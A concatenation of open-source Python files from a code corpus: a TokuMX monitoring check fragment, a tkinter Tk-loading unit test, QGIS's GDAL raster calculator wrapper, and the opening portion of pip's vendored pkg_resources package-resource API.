self.gauge('tokumx.%s' % m, value, tags=tags)
if m in self.RATES:
self.rate('tokumx.%sps' % m, value, tags=tags)
def check(self, instance):
server, conn, db, tags = self._get_connection(instance)
if conn.is_mongos:
self.collect_mongos(server, conn, db, tags)
else:
self.collect_metrics(instance, server, conn, db, tags)
| bsd-3-clause |
paweljasinski/ironpython3 | Src/StdLib/Lib/tkinter/test/test_tkinter/test_loadtk.py | 162 | 1503 | import os
import sys
import unittest
import test.support as test_support
from tkinter import Tcl, TclError
test_support.requires('gui')
class TkLoadTest(unittest.TestCase):
@unittest.skipIf('DISPLAY' not in os.environ, 'No $DISPLAY set.')
def testLoadTk(self):
tcl = Tcl()
self.assertRaises(TclError,tcl.winfo_geometry)
tcl.loadtk()
self.assertEqual('1x1+0+0', tcl.winfo_geometry())
tcl.destroy()
def testLoadTkFailure(self):
old_display = None
if sys.platform.startswith(('win', 'darwin', 'cygwin')):
# no failure possible on windows?
# XXX Maybe on tk older than 8.4.13 it would be possible,
# see tkinter.h.
return
with test_support.EnvironmentVarGuard() as env:
if 'DISPLAY' in os.environ:
del env['DISPLAY']
# on some platforms, deleting environment variables
# doesn't actually carry through to the process level
# because they don't support unsetenv
# If that's the case, abort.
with os.popen('echo $DISPLAY') as pipe:
display = pipe.read().strip()
if display:
return
tcl = Tcl()
self.assertRaises(TclError, tcl.winfo_geometry)
self.assertRaises(TclError, tcl.loadtk)
tests_gui = (TkLoadTest, )
if __name__ == "__main__":
test_support.run_unittest(*tests_gui)
| apache-2.0 |
CS-SI/QGIS | python/plugins/processing/algs/gdal/gdalcalc.py | 7 | 7588 | # -*- coding: utf-8 -*-
"""
***************************************************************************
gdalcalc.py
---------------------
Date : January 2015
Copyright : (C) 2015 by Giovanni Manghi
Email : giovanni dot manghi at naturalgis dot pt
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Giovanni Manghi'
__date__ = 'January 2015'
__copyright__ = '(C) 2015, Giovanni Manghi'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.algs.gdal.GdalUtils import GdalUtils
# Parameter*/Output* classes referenced below come from the legacy (2.x)
# Processing framework:
from processing.core.parameters import (ParameterRaster,
                                        ParameterString,
                                        ParameterSelection)
from processing.core.outputs import OutputRaster
from processing.tools.system import isWindows
class gdalcalc(GdalAlgorithm):
INPUT_A = 'INPUT_A'
INPUT_B = 'INPUT_B'
INPUT_C = 'INPUT_C'
INPUT_D = 'INPUT_D'
INPUT_E = 'INPUT_E'
INPUT_F = 'INPUT_F'
BAND_A = 'BAND_A'
BAND_B = 'BAND_B'
BAND_C = 'BAND_C'
BAND_D = 'BAND_D'
BAND_E = 'BAND_E'
BAND_F = 'BAND_F'
FORMULA = 'FORMULA'
OUTPUT = 'OUTPUT'
NO_DATA = 'NO_DATA'
EXTRA = 'EXTRA'
RTYPE = 'RTYPE'
TYPE = ['Byte', 'Int16', 'UInt16', 'UInt32', 'Int32', 'Float32', 'Float64']
#DEBUG = 'DEBUG'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(ParameterRaster(
self.INPUT_A, self.tr('Input layer A'), False))
self.addParameter(ParameterString(self.BAND_A,
self.tr('Number of raster band for raster A'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_B, self.tr('Input layer B'), True))
self.addParameter(ParameterString(self.BAND_B,
self.tr('Number of raster band for raster B'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_C, self.tr('Input layer C'), True))
self.addParameter(ParameterString(self.BAND_C,
self.tr('Number of raster band for raster C'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_D, self.tr('Input layer D'), True))
self.addParameter(ParameterString(self.BAND_D,
self.tr('Number of raster band for raster D'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_E, self.tr('Input layer E'), True))
self.addParameter(ParameterString(self.BAND_E,
self.tr('Number of raster band for raster E'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_F, self.tr('Input layer F'), True))
self.addParameter(ParameterString(self.BAND_F,
self.tr('Number of raster band for raster F'), '1', optional=True))
self.addParameter(ParameterString(self.FORMULA,
            self.tr('Calculation in gdalnumeric syntax using +-/* or any numpy array functions (e.g. logical_and())'), 'A*2', optional=False))
self.addParameter(ParameterString(self.NO_DATA,
self.tr('Set output nodata value'), '', optional=True))
self.addParameter(ParameterSelection(self.RTYPE,
self.tr('Output raster type'), self.TYPE, 5))
#self.addParameter(ParameterBoolean(
# self.DEBUG, self.tr('Print debugging information'), False))
self.addParameter(ParameterString(self.EXTRA,
self.tr('Additional creation parameters'), '', optional=True))
self.addOutput(OutputRaster(self.OUTPUT, self.tr('Calculated')))
def name(self):
return 'rastercalculator'
def displayName(self):
return self.tr('Raster calculator')
def group(self):
return self.tr('Raster miscellaneous')
def groupId(self):
return 'rastermiscellaneous'
def getConsoleCommands(self, parameters, context, feedback, executing=True):
out = self.getOutputValue(self.OUTPUT)
extra = self.getParameterValue(self.EXTRA)
if extra is not None:
extra = str(extra)
#debug = self.getParameterValue(self.DEBUG)
formula = self.getParameterValue(self.FORMULA)
noData = self.getParameterValue(self.NO_DATA)
if noData is not None:
noData = str(noData)
arguments = []
arguments.append('--calc')
arguments.append('"' + formula + '"')
arguments.append('--format')
arguments.append(GdalUtils.getFormatShortNameFromFilename(out))
arguments.append('--type')
arguments.append(self.TYPE[self.getParameterValue(self.RTYPE)])
if noData and len(noData) > 0:
arguments.append('--NoDataValue')
arguments.append(noData)
if extra and len(extra) > 0:
arguments.append(extra)
#if debug:
# arguments.append('--debug')
arguments.append('-A')
arguments.append(self.getParameterValue(self.INPUT_A))
if self.getParameterValue(self.BAND_A):
arguments.append('--A_band ' + self.getParameterValue(self.BAND_A))
if self.getParameterValue(self.INPUT_B):
arguments.append('-B')
arguments.append(self.getParameterValue(self.INPUT_B))
if self.getParameterValue(self.BAND_B):
arguments.append('--B_band ' + self.getParameterValue(self.BAND_B))
if self.getParameterValue(self.INPUT_C):
arguments.append('-C')
arguments.append(self.getParameterValue(self.INPUT_C))
if self.getParameterValue(self.BAND_C):
arguments.append('--C_band ' + self.getParameterValue(self.BAND_C))
if self.getParameterValue(self.INPUT_D):
arguments.append('-D')
arguments.append(self.getParameterValue(self.INPUT_D))
if self.getParameterValue(self.BAND_D):
arguments.append('--D_band ' + self.getParameterValue(self.BAND_D))
if self.getParameterValue(self.INPUT_E):
arguments.append('-E')
arguments.append(self.getParameterValue(self.INPUT_E))
if self.getParameterValue(self.BAND_E):
arguments.append('--E_band ' + self.getParameterValue(self.BAND_E))
if self.getParameterValue(self.INPUT_F):
arguments.append('-F')
arguments.append(self.getParameterValue(self.INPUT_F))
if self.getParameterValue(self.BAND_F):
arguments.append('--F_band ' + self.getParameterValue(self.BAND_F))
arguments.append('--outfile')
arguments.append(out)
if isWindows():
return ['gdal_calc', GdalUtils.escapeAndJoin(arguments)]
else:
return ['gdal_calc.py', GdalUtils.escapeAndJoin(arguments)]
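
    # Illustrative result: with only layer A set, formula "A*2", a GeoTIFF
    # output and the default Float32 type, getConsoleCommands() returns
    # roughly:
    #   gdal_calc.py --calc "A*2" --format GTiff --type Float32 \
    #                -A input.tif --A_band 1 --outfile out.tif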
| gpl-2.0 |
wkeyword/pip | pip/_vendor/pkg_resources/__init__.py | 252 | 106466 | """
Package resource API
--------------------
A resource is a logical file contained within a package, or a logical
subdirectory thereof. The package resource API expects resource names
to have their path parts separated with ``/``, *not* whatever the local
path separator is. Do not use os.path operations to manipulate resource
names being passed into the API.
The package resource API is designed to work with normal filesystem packages,
.egg files, and unpacked .egg files. It can also work in a limited way with
.zip files and with custom PEP 302 loaders that support the ``get_data()``
method.
"""
from __future__ import absolute_import
import sys
import os
import io
import time
import re
import types
import zipfile
import zipimport
import warnings
import stat
import functools
import pkgutil
import token
import symbol
import operator
import platform
import collections
import plistlib
import email.parser
import tempfile
import textwrap
from pkgutil import get_importer
try:
import _imp
except ImportError:
# Python 3.2 compatibility
import imp as _imp
PY3 = sys.version_info > (3,)
PY2 = not PY3
if PY3:
from urllib.parse import urlparse, urlunparse
if PY2:
from urlparse import urlparse, urlunparse
if PY3:
string_types = str,
else:
string_types = str, eval('unicode')
iteritems = (lambda i: i.items()) if PY3 else lambda i: i.iteritems()
# capture these to bypass sandboxing
from os import utime
try:
from os import mkdir, rename, unlink
WRITE_SUPPORT = True
except ImportError:
# no write support, probably under GAE
WRITE_SUPPORT = False
from os import open as os_open
from os.path import isdir, split
# Avoid try/except due to potential problems with delayed import mechanisms.
if sys.version_info >= (3, 3) and sys.implementation.name == "cpython":
import importlib.machinery as importlib_machinery
else:
importlib_machinery = None
try:
import parser
except ImportError:
pass
import pip._vendor.packaging.version
import pip._vendor.packaging.specifiers
packaging = pip._vendor.packaging
# declare some globals that will be defined later to
# satisfy the linters.
require = None
working_set = None
class PEP440Warning(RuntimeWarning):
"""
Used when there is an issue with a version or specifier not complying with
PEP 440.
"""
class _SetuptoolsVersionMixin(object):
def __hash__(self):
return super(_SetuptoolsVersionMixin, self).__hash__()
def __lt__(self, other):
if isinstance(other, tuple):
return tuple(self) < other
else:
return super(_SetuptoolsVersionMixin, self).__lt__(other)
def __le__(self, other):
if isinstance(other, tuple):
return tuple(self) <= other
else:
return super(_SetuptoolsVersionMixin, self).__le__(other)
def __eq__(self, other):
if isinstance(other, tuple):
return tuple(self) == other
else:
return super(_SetuptoolsVersionMixin, self).__eq__(other)
def __ge__(self, other):
if isinstance(other, tuple):
return tuple(self) >= other
else:
return super(_SetuptoolsVersionMixin, self).__ge__(other)
def __gt__(self, other):
if isinstance(other, tuple):
return tuple(self) > other
else:
return super(_SetuptoolsVersionMixin, self).__gt__(other)
def __ne__(self, other):
if isinstance(other, tuple):
return tuple(self) != other
else:
return super(_SetuptoolsVersionMixin, self).__ne__(other)
def __getitem__(self, key):
return tuple(self)[key]
def __iter__(self):
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = {
'pre': 'c',
'preview': 'c',
'-': 'final-',
'rc': 'c',
'dev': '@',
}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part, part)
if not part or part == '.':
continue
if part[:1] in '0123456789':
# pad for numeric comparison
yield part.zfill(8)
else:
yield '*'+part
# ensure that alpha/beta/candidate are before final
yield '*final'
def old_parse_version(s):
parts = []
for part in _parse_version_parts(s.lower()):
if part.startswith('*'):
# remove '-' before a prerelease tag
if part < '*final':
while parts and parts[-1] == '*final-':
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == '00000000':
parts.pop()
parts.append(part)
return tuple(parts)
# Warn for use of this function
warnings.warn(
"You have iterated over the result of "
"pkg_resources.parse_version. This is a legacy behavior which is "
"inconsistent with the new version class introduced in setuptools "
"8.0. In most cases, conversion to a tuple is unnecessary. For "
"comparison of versions, sort the Version instances directly. If "
"you have another use case requiring the tuple, please file a "
"bug with the setuptools project describing that need.",
RuntimeWarning,
stacklevel=1,
)
for part in old_parse_version(str(self)):
yield part
class SetuptoolsVersion(_SetuptoolsVersionMixin, packaging.version.Version):
pass
class SetuptoolsLegacyVersion(_SetuptoolsVersionMixin,
packaging.version.LegacyVersion):
pass
def parse_version(v):
try:
return SetuptoolsVersion(v)
except packaging.version.InvalidVersion:
return SetuptoolsLegacyVersion(v)
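
# Illustrative behaviour: PEP 440 strings become comparable version objects,
# and anything unparseable falls back to the legacy scheme.
#   >>> parse_version('1.0.post1') > parse_version('1.0')
#   True
#   >>> isinstance(parse_version('not!a!version'), SetuptoolsLegacyVersion)
#   True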
_state_vars = {}
def _declare_state(vartype, **kw):
globals().update(kw)
_state_vars.update(dict.fromkeys(kw, vartype))
def __getstate__():
state = {}
g = globals()
for k, v in _state_vars.items():
state[k] = g['_sget_'+v](g[k])
return state
def __setstate__(state):
g = globals()
for k, v in state.items():
g['_sset_'+_state_vars[k]](k, g[k], v)
return state
def _sget_dict(val):
return val.copy()
def _sset_dict(key, ob, state):
ob.clear()
ob.update(state)
def _sget_object(val):
return val.__getstate__()
def _sset_object(key, ob, state):
ob.__setstate__(state)
_sget_none = _sset_none = lambda *args: None
def get_supported_platform():
"""Return this platform's maximum compatible version.
distutils.util.get_platform() normally reports the minimum version
of Mac OS X that would be required to *use* extensions produced by
distutils. But what we want when checking compatibility is to know the
version of Mac OS X that we are *running*. To allow usage of packages that
explicitly require a newer version of Mac OS X, we must also know the
current version of the OS.
If this condition occurs for any other platform with a version in its
platform strings, this function should be extended accordingly.
"""
plat = get_build_platform()
m = macosVersionString.match(plat)
if m is not None and sys.platform == "darwin":
try:
plat = 'macosx-%s-%s' % ('.'.join(_macosx_vers()[:2]), m.group(3))
except ValueError:
# not Mac OS X
pass
return plat
__all__ = [
# Basic resource access and distribution/entry point discovery
'require', 'run_script', 'get_provider', 'get_distribution',
'load_entry_point', 'get_entry_map', 'get_entry_info',
'iter_entry_points',
'resource_string', 'resource_stream', 'resource_filename',
'resource_listdir', 'resource_exists', 'resource_isdir',
# Environmental control
'declare_namespace', 'working_set', 'add_activation_listener',
'find_distributions', 'set_extraction_path', 'cleanup_resources',
'get_default_cache',
# Primary implementation classes
'Environment', 'WorkingSet', 'ResourceManager',
'Distribution', 'Requirement', 'EntryPoint',
# Exceptions
'ResolutionError', 'VersionConflict', 'DistributionNotFound',
'UnknownExtra', 'ExtractionError',
# Warnings
'PEP440Warning',
# Parsing functions and string utilities
'parse_requirements', 'parse_version', 'safe_name', 'safe_version',
'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections',
'safe_extra', 'to_filename', 'invalid_marker', 'evaluate_marker',
# filesystem utilities
'ensure_directory', 'normalize_path',
# Distribution "precedence" constants
'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST',
# "Provider" interfaces, implementations, and registration/lookup APIs
'IMetadataProvider', 'IResourceProvider', 'FileMetadata',
'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider',
'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider',
'register_finder', 'register_namespace_handler', 'register_loader_type',
'fixup_namespace_packages', 'get_importer',
# Deprecated/backward compatibility only
'run_main', 'AvailableDistributions',
]
class ResolutionError(Exception):
"""Abstract base for dependency resolution errors"""
def __repr__(self):
return self.__class__.__name__+repr(self.args)
class VersionConflict(ResolutionError):
"""
An already-installed version conflicts with the requested version.
Should be initialized with the installed Distribution and the requested
Requirement.
"""
_template = "{self.dist} is installed but {self.req} is required"
@property
def dist(self):
return self.args[0]
@property
def req(self):
return self.args[1]
def report(self):
return self._template.format(**locals())
def with_context(self, required_by):
"""
If required_by is non-empty, return a version of self that is a
ContextualVersionConflict.
"""
if not required_by:
return self
args = self.args + (required_by,)
return ContextualVersionConflict(*args)
class ContextualVersionConflict(VersionConflict):
"""
A VersionConflict that accepts a third parameter, the set of the
requirements that required the installed Distribution.
"""
_template = VersionConflict._template + ' by {self.required_by}'
@property
def required_by(self):
return self.args[2]
class DistributionNotFound(ResolutionError):
"""A requested distribution was not found"""
_template = ("The '{self.req}' distribution was not found "
"and is required by {self.requirers_str}")
@property
def req(self):
return self.args[0]
@property
def requirers(self):
return self.args[1]
@property
def requirers_str(self):
if not self.requirers:
return 'the application'
return ', '.join(self.requirers)
def report(self):
return self._template.format(**locals())
def __str__(self):
return self.report()
class UnknownExtra(ResolutionError):
"""Distribution doesn't have an "extra feature" of the given name"""
_provider_factories = {}
PY_MAJOR = sys.version[:3]
EGG_DIST = 3
BINARY_DIST = 2
SOURCE_DIST = 1
CHECKOUT_DIST = 0
DEVELOP_DIST = -1
def register_loader_type(loader_type, provider_factory):
"""Register `provider_factory` to make providers for `loader_type`
`loader_type` is the type or class of a PEP 302 ``module.__loader__``,
and `provider_factory` is a function that, passed a *module* object,
returns an ``IResourceProvider`` for that module.
"""
_provider_factories[loader_type] = provider_factory
def get_provider(moduleOrReq):
"""Return an IResourceProvider for the named module or requirement"""
if isinstance(moduleOrReq, Requirement):
return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0]
try:
module = sys.modules[moduleOrReq]
except KeyError:
__import__(moduleOrReq)
module = sys.modules[moduleOrReq]
loader = getattr(module, '__loader__', None)
return _find_adapter(_provider_factories, loader)(module)
def _macosx_vers(_cache=[]):
if not _cache:
version = platform.mac_ver()[0]
# fallback for MacPorts
if version == '':
plist = '/System/Library/CoreServices/SystemVersion.plist'
if os.path.exists(plist):
if hasattr(plistlib, 'readPlist'):
plist_content = plistlib.readPlist(plist)
if 'ProductVersion' in plist_content:
version = plist_content['ProductVersion']
_cache.append(version.split('.'))
return _cache[0]
def _macosx_arch(machine):
return {'PowerPC': 'ppc', 'Power_Macintosh': 'ppc'}.get(machine, machine)
def get_build_platform():
"""Return this platform's string for platform-specific distributions
XXX Currently this is the same as ``distutils.util.get_platform()``, but it
needs some hacks for Linux and Mac OS X.
"""
try:
# Python 2.7 or >=3.2
from sysconfig import get_platform
except ImportError:
from distutils.util import get_platform
plat = get_platform()
if sys.platform == "darwin" and not plat.startswith('macosx-'):
try:
version = _macosx_vers()
machine = os.uname()[4].replace(" ", "_")
return "macosx-%d.%d-%s" % (int(version[0]), int(version[1]),
_macosx_arch(machine))
except ValueError:
# if someone is running a non-Mac darwin system, this will fall
# through to the default implementation
pass
return plat
macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)")
darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)")
# XXX backward compat
get_platform = get_build_platform
def compatible_platforms(provided, required):
"""Can code for the `provided` platform run on the `required` platform?
Returns true if either platform is ``None``, or the platforms are equal.
XXX Needs compatibility checks for Linux and other unixy OSes.
"""
if provided is None or required is None or provided==required:
# easy case
return True
# Mac OS X special cases
reqMac = macosVersionString.match(required)
if reqMac:
provMac = macosVersionString.match(provided)
# is this a Mac package?
if not provMac:
# this is backwards compatibility for packages built before
# setuptools 0.6. All packages built after this point will
# use the new macosx designation.
provDarwin = darwinVersionString.match(provided)
if provDarwin:
dversion = int(provDarwin.group(1))
macosversion = "%s.%s" % (reqMac.group(1), reqMac.group(2))
if dversion == 7 and macosversion >= "10.3" or \
dversion == 8 and macosversion >= "10.4":
return True
# egg isn't macosx or legacy darwin
return False
# are they the same major version and machine type?
if provMac.group(1) != reqMac.group(1) or \
provMac.group(3) != reqMac.group(3):
return False
# is the required OS major update >= the provided one?
if int(provMac.group(2)) > int(reqMac.group(2)):
return False
return True
# XXX Linux and other platforms' special cases should go here
return False
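
# Illustrative checks (following the Mac OS X rules above): a build for an
# older minor OS version is usable on a newer one, but not vice versa.
#   compatible_platforms('macosx-10.3-ppc', 'macosx-10.4-ppc')  # -> True
#   compatible_platforms('macosx-10.5-ppc', 'macosx-10.4-ppc')  # -> False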
def run_script(dist_spec, script_name):
"""Locate distribution `dist_spec` and run its `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
require(dist_spec)[0].run_script(script_name, ns)
# backward compatibility
run_main = run_script
def get_distribution(dist):
"""Return a current distribution object for a Requirement or string"""
if isinstance(dist, string_types):
dist = Requirement.parse(dist)
if isinstance(dist, Requirement):
dist = get_provider(dist)
if not isinstance(dist, Distribution):
raise TypeError("Expected string, Requirement, or Distribution", dist)
return dist
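
# Illustrative equivalence (assuming the 'setuptools' project is installed):
#   get_distribution('setuptools')
#   get_distribution(Requirement.parse('setuptools'))
# both resolve to the active Distribution for that project.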
def load_entry_point(dist, group, name):
"""Return `name` entry point of `group` for `dist` or raise ImportError"""
return get_distribution(dist).load_entry_point(group, name)
def get_entry_map(dist, group=None):
"""Return the entry point map for `group`, or the full entry map"""
return get_distribution(dist).get_entry_map(group)
def get_entry_info(dist, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return get_distribution(dist).get_entry_info(group, name)
class IMetadataProvider:
def has_metadata(name):
"""Does the package's distribution contain the named metadata?"""
def get_metadata(name):
"""The named metadata resource as a string"""
def get_metadata_lines(name):
"""Yield named metadata resource as list of non-blank non-comment lines
Leading and trailing whitespace is stripped from each line, and lines
with ``#`` as the first non-blank character are omitted."""
def metadata_isdir(name):
"""Is the named metadata a directory? (like ``os.path.isdir()``)"""
def metadata_listdir(name):
"""List of metadata names in the directory (like ``os.listdir()``)"""
def run_script(script_name, namespace):
"""Execute the named script in the supplied namespace dictionary"""
class IResourceProvider(IMetadataProvider):
"""An object that provides access to package resources"""
def get_resource_filename(manager, resource_name):
"""Return a true filesystem path for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_stream(manager, resource_name):
"""Return a readable file-like object for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_string(manager, resource_name):
"""Return a string containing the contents of `resource_name`
`manager` must be an ``IResourceManager``"""
def has_resource(resource_name):
"""Does the package contain the named resource?"""
def resource_isdir(resource_name):
"""Is the named resource a directory? (like ``os.path.isdir()``)"""
def resource_listdir(resource_name):
"""List of resource names in the directory (like ``os.listdir()``)"""
class WorkingSet(object):
"""A collection of active distributions on sys.path (or a similar list)"""
def __init__(self, entries=None):
"""Create working set from list of path entries (default=sys.path)"""
self.entries = []
self.entry_keys = {}
self.by_key = {}
self.callbacks = []
if entries is None:
entries = sys.path
for entry in entries:
self.add_entry(entry)
@classmethod
def _build_master(cls):
"""
Prepare the master working set.
"""
ws = cls()
try:
from __main__ import __requires__
except ImportError:
# The main program does not list any requirements
return ws
# ensure the requirements are met
try:
ws.require(__requires__)
except VersionConflict:
return cls._build_from_requirements(__requires__)
return ws
@classmethod
def _build_from_requirements(cls, req_spec):
"""
Build a working set from a requirement spec. Rewrites sys.path.
"""
# try it without defaults already on sys.path
# by starting with an empty path
ws = cls([])
reqs = parse_requirements(req_spec)
dists = ws.resolve(reqs, Environment())
for dist in dists:
ws.add(dist)
# add any missing entries from sys.path
for entry in sys.path:
if entry not in ws.entries:
ws.add_entry(entry)
# then copy back to sys.path
sys.path[:] = ws.entries
return ws
def add_entry(self, entry):
"""Add a path item to ``.entries``, finding any distributions on it
``find_distributions(entry, True)`` is used to find distributions
corresponding to the path entry, and they are added. `entry` is
always appended to ``.entries``, even if it is already present.
(This is because ``sys.path`` can contain the same value more than
once, and the ``.entries`` of the ``sys.path`` WorkingSet should always
equal ``sys.path``.)
"""
self.entry_keys.setdefault(entry, [])
self.entries.append(entry)
for dist in find_distributions(entry, True):
self.add(dist, entry, False)
def __contains__(self, dist):
"""True if `dist` is the active distribution for its project"""
return self.by_key.get(dist.key) == dist
def find(self, req):
"""Find a distribution matching requirement `req`
If there is an active distribution for the requested project, this
returns it as long as it meets the version requirement specified by
`req`. But, if there is an active distribution for the project and it
does *not* meet the `req` requirement, ``VersionConflict`` is raised.
If there is no active distribution for the requested project, ``None``
is returned.
"""
dist = self.by_key.get(req.key)
if dist is not None and dist not in req:
# XXX add more info
raise VersionConflict(dist, req)
return dist
def iter_entry_points(self, group, name=None):
"""Yield entry point objects from `group` matching `name`
If `name` is None, yields all entry points in `group` from all
distributions in the working set, otherwise only ones matching
both `group` and `name` are yielded (in distribution order).
"""
for dist in self:
entries = dist.get_entry_map(group)
if name is None:
for ep in entries.values():
yield ep
elif name in entries:
yield entries[name]
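
    # Illustrative usage (using the standard 'console_scripts' group):
    #   for ep in working_set.iter_entry_points('console_scripts'):
    #       print(ep.name)    # entry point names, in distribution order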
def run_script(self, requires, script_name):
"""Locate distribution for `requires` and run `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
self.require(requires)[0].run_script(script_name, ns)
def __iter__(self):
"""Yield distributions for non-duplicate projects in the working set
The yield order is the order in which the items' path entries were
added to the working set.
"""
seen = {}
for item in self.entries:
if item not in self.entry_keys:
# workaround a cache issue
continue
for key in self.entry_keys[item]:
if key not in seen:
seen[key]=1
yield self.by_key[key]
def add(self, dist, entry=None, insert=True, replace=False):
"""Add `dist` to working set, associated with `entry`
If `entry` is unspecified, it defaults to the ``.location`` of `dist`.
On exit from this routine, `entry` is added to the end of the working
set's ``.entries`` (if it wasn't already present).
`dist` is only added to the working set if it's for a project that
doesn't already have a distribution in the set, unless `replace=True`.
If it's added, any callbacks registered with the ``subscribe()`` method
will be called.
"""
if insert:
dist.insert_on(self.entries, entry)
if entry is None:
entry = dist.location
keys = self.entry_keys.setdefault(entry,[])
keys2 = self.entry_keys.setdefault(dist.location,[])
if not replace and dist.key in self.by_key:
# ignore hidden distros
return
self.by_key[dist.key] = dist
if dist.key not in keys:
keys.append(dist.key)
if dist.key not in keys2:
keys2.append(dist.key)
self._added_new(dist)
def resolve(self, requirements, env=None, installer=None,
replace_conflicting=False):
"""List all distributions needed to (recursively) meet `requirements`
`requirements` must be a sequence of ``Requirement`` objects. `env`,
if supplied, should be an ``Environment`` instance. If
not supplied, it defaults to all distributions available within any
entry or distribution in the working set. `installer`, if supplied,
will be invoked with each requirement that cannot be met by an
already-installed distribution; it should return a ``Distribution`` or
``None``.
Unless `replace_conflicting=True`, raises a VersionConflict exception if
any requirements are found on the path that have the correct name but
the wrong version. Otherwise, if an `installer` is supplied it will be
invoked to obtain the correct version of the requirement and activate
it.
"""
# set up the stack
requirements = list(requirements)[::-1]
# set of processed requirements
processed = {}
# key -> dist
best = {}
to_activate = []
# Mapping of requirement to set of distributions that required it;
# useful for reporting info about conflicts.
required_by = collections.defaultdict(set)
while requirements:
# process dependencies breadth-first
req = requirements.pop(0)
if req in processed:
# Ignore cyclic or redundant dependencies
continue
dist = best.get(req.key)
if dist is None:
# Find the best distribution and add it to the map
dist = self.by_key.get(req.key)
if dist is None or (dist not in req and replace_conflicting):
ws = self
if env is None:
if dist is None:
env = Environment(self.entries)
else:
# Use an empty environment and workingset to avoid
# any further conflicts with the conflicting
# distribution
env = Environment([])
ws = WorkingSet([])
dist = best[req.key] = env.best_match(req, ws, installer)
if dist is None:
requirers = required_by.get(req, None)
raise DistributionNotFound(req, requirers)
to_activate.append(dist)
if dist not in req:
# Oops, the "best" so far conflicts with a dependency
dependent_req = required_by[req]
raise VersionConflict(dist, req).with_context(dependent_req)
# push the new requirements onto the stack
new_requirements = dist.requires(req.extras)[::-1]
requirements.extend(new_requirements)
# Register the new requirements needed by req
for new_requirement in new_requirements:
required_by[new_requirement].add(req.project_name)
processed[req] = True
# return list of distros to activate
return to_activate
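
    # Illustrative usage sketch (the requirement string is hypothetical):
    #   reqs = parse_requirements('example-dist>=1.0')
    #   for dist in working_set.resolve(reqs):  # DistributionNotFound if absent
    #       working_set.add(dist)
    # which is essentially what require() below does.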
def find_plugins(self, plugin_env, full_env=None, installer=None,
fallback=True):
"""Find all activatable distributions in `plugin_env`
Example usage::
distributions, errors = working_set.find_plugins(
Environment(plugin_dirlist)
)
# add plugins+libs to sys.path
map(working_set.add, distributions)
# display errors
print('Could not load', errors)
The `plugin_env` should be an ``Environment`` instance that contains
only distributions that are in the project's "plugin directory" or
directories. The `full_env`, if supplied, should be an ``Environment``
contains all currently-available distributions. If `full_env` is not
supplied, one is created automatically from the ``WorkingSet`` this
method is called on, which will typically mean that every directory on
``sys.path`` will be scanned for distributions.
`installer` is a standard installer callback as used by the
``resolve()`` method. The `fallback` flag indicates whether we should
attempt to resolve older versions of a plugin if the newest version
cannot be resolved.
This method returns a 2-tuple: (`distributions`, `error_info`), where
`distributions` is a list of the distributions found in `plugin_env`
that were loadable, along with any other distributions that are needed
to resolve their dependencies. `error_info` is a dictionary mapping
unloadable plugin distributions to an exception instance describing the
error that occurred. Usually this will be a ``DistributionNotFound`` or
``VersionConflict`` instance.
"""
plugin_projects = list(plugin_env)
# scan project names in alphabetic order
plugin_projects.sort()
error_info = {}
distributions = {}
if full_env is None:
env = Environment(self.entries)
env += plugin_env
else:
env = full_env + plugin_env
shadow_set = self.__class__([])
# put all our entries in shadow_set
list(map(shadow_set.add, self))
for project_name in plugin_projects:
for dist in plugin_env[project_name]:
req = [dist.as_requirement()]
try:
resolvees = shadow_set.resolve(req, env, installer)
except ResolutionError as v:
# save error info
error_info[dist] = v
if fallback:
# try the next older version of project
continue
else:
# give up on this project, keep going
break
else:
list(map(shadow_set.add, resolvees))
distributions.update(dict.fromkeys(resolvees))
# success, no need to try any more versions of this project
break
distributions = list(distributions)
distributions.sort()
return distributions, error_info
def require(self, *requirements):
"""Ensure that distributions matching `requirements` are activated
`requirements` must be a string or a (possibly-nested) sequence
thereof, specifying the distributions and versions required. The
return value is a sequence of the distributions that needed to be
activated to fulfill the requirements; all relevant distributions are
included, even if they were already activated in this working set.
"""
needed = self.resolve(parse_requirements(requirements))
for dist in needed:
self.add(dist)
return needed
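    # Illustrative sketch (not part of the original module): activating a
    # requirement through the global working set. 'FooPkg' is a hypothetical
    # project name; any installed distribution works the same way.
    #
    #     import pkg_resources
    #     for dist in pkg_resources.working_set.require('FooPkg>=1.2'):
    #         print(dist.project_name, dist.version)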
def subscribe(self, callback):
"""Invoke `callback` for all distributions (including existing ones)"""
if callback in self.callbacks:
return
self.callbacks.append(callback)
for dist in self:
callback(dist)
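    # Illustrative sketch (assumption: callback used for logging): the
    # callback fires once per distribution already in the set, then again
    # for every distribution added later.
    #
    #     working_set.subscribe(lambda dist: print('activated', dist))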
def _added_new(self, dist):
for callback in self.callbacks:
callback(dist)
def __getstate__(self):
return (
self.entries[:], self.entry_keys.copy(), self.by_key.copy(),
self.callbacks[:]
)
def __setstate__(self, e_k_b_c):
entries, keys, by_key, callbacks = e_k_b_c
self.entries = entries[:]
self.entry_keys = keys.copy()
